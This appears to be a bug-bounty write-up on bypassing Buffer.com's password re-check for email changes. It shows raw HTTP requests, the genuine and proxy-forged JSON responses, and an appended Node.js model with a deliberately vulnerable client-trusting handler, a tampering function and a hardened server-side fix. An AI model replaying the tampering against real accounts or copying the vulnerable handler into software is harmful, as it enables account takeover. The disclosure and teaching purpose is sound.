Hi everyone, here is one of my findings on Buffer.com, where I managed to bypass the password re-check (Buffer calls it "sudo mode") that guards the account email change.
So basically the workflow is like below:
- To change the account email, the user needs to provide the current account password
- If the password is correct, the application lets you change the account email
So let's start.
When a user wants to change their account email, the app asks for the current password. I wanted to compare the responses for a correct and an incorrect password, so here is the request:
POST /account/set-sudomode HTTP/1.1
Date: *****
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest

csrf_token=uyr37832rhehr8&password=wrongpassword
The response for the wrong password:
HTTP/1.1 200 OK
Date: Mon, ****
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"}
And the response for the correct password:
HTTP/1.1 200 OK
Date: Mon, ****
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}
If you compare the two responses, the only difference is that the correct-password response replaces error_message with notice_message and adds "sudomode":"true". Both come back as 200 OK, which suggests the page decides whether you are re-authenticated from this JSON body alone, so the obvious test is to forge that body.
So I sent a wrong password, let's say 123456, with the browser going through an intercepting proxy so the response could be edited before it reaches the page.
The request:
POST /account/set-sudomode HTTP/1.1
Date: *****
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest

csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456
Note the csrf_token value in the request, which is uyr37832rhehr8he7372829hefdgdf; it has to stay the same in the forged response.
Response:
HTTP/1.1 200 OK
Date: Mon, ****
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}
In the proxy, modify the intercepted response before forwarding it to the browser, keeping the csrf_token unchanged:
HTTP/1.1 200 OK
Date: Mon, ****
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}
Boom, the page now shows you as successfully authenticated and lets you change the email, even though the password was wrong: the browser unlocks the email-change form based on the sudomode flag in the response alone, so anyone who controls the response (the user's own proxy) controls the check.
So here is the video proof of concept
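The bypass above, as an added example in plain Node.js that is not Buffer's code: it models the two response bodies from the post, the proxy rewrite of the error body into the success body, a vulnerable email-change handler that trusts the client's "sudo mode" flag, and a hardened handler that only consults server-side session state. The session shape, the handler names, and the 5-minute window are assumptions for illustration.

```javascript
// Added example, not Buffer's code: a model of the response-manipulation
// bypass described in this post and of the server-side check that defeats it.
// The session shape, handler names and the 5-minute window are assumptions.

const SUDO_WINDOW_MS = 5 * 60 * 1000; // assumption: how long "sudo mode" lasts

// Constructed sample session: one logged-in user, not yet re-authenticated.
function newSession() {
  return {
    email: 'victim@example.com',
    password: 'correct horse battery staple', // real code stores a password hash
    csrf: 'uyr37832rhehr8',                   // token value taken from the post
    sudoUntil: 0,                             // server-side "sudo mode" expiry
  };
}

// POST /account/set-sudomode: the two body shapes mirror the ones in the post.
function setSudoMode(session, password, now = Date.now()) {
  if (password !== session.password) {
    return {
      error_message: "Huh That's not your current password, are you sure you got that right?",
      csrf_token: session.csrf,
    };
  }
  session.sudoUntil = now + SUDO_WINDOW_MS; // the granted state lives on the server
  return { notice_message: "Great, we believe it's really you", sudomode: 'true', csrf_token: session.csrf };
}

// What the intercepting proxy does in the write-up: rewrite the error body into
// the success body while keeping csrf_token unchanged.
function tamperResponse(body) {
  if (!('error_message' in body)) return body;
  return { notice_message: "Great, we believe it's really you", sudomode: 'true', csrf_token: body.csrf_token };
}

// Vulnerable pattern: the page unlocks the email form from the body it received,
// and the email-change handler trusts a flag the client sends back.
function clientUnlocked(body) {
  return body.sudomode === 'true';
}
function changeEmailTrustingClient(session, sudomodeFlag, newEmail) {
  if (sudomodeFlag !== 'true') return { error: 'sudo mode required' };
  session.email = newEmail;
  return { ok: true };
}

// Hardened pattern: the handler consults only the server-side session, so a
// forged response (or a forged flag in the request) changes nothing.
function changeEmailServerChecked(session, newEmail, now = Date.now()) {
  if (session.sudoUntil <= now) return { error: 'sudo mode required' };
  session.email = newEmail;
  return { ok: true };
}

// Walk the bypass end to end with the wrong password from the post.
function demo() {
  const session = newSession();
  const forged = tamperResponse(setSudoMode(session, '123456', 1000));
  return {
    uiUnlocked: clientUnlocked(forged),                                                                              // true
    trustingHandlerAccepts: changeEmailTrustingClient(session, forged.sudomode, 'attacker@example.com').ok === true, // true
    hardenedHandlerAccepts: changeEmailServerChecked(session, 'attacker@example.com', 2000).ok === true,             // false
  };
}

console.log(demo());
```

Run it with node; it prints `{ uiUnlocked: true, trustingHandlerAccepts: true, hardenedHandlerAccepts: false }`. The practical point when testing a finding like this is the last field: a forged response always changes what the page shows, so the report should confirm that the email change actually persisted on the server (for example by logging in again or checking the account afterwards), and the fix is for the email-change endpoint to require the server-recorded sudo state rather than anything the client sends.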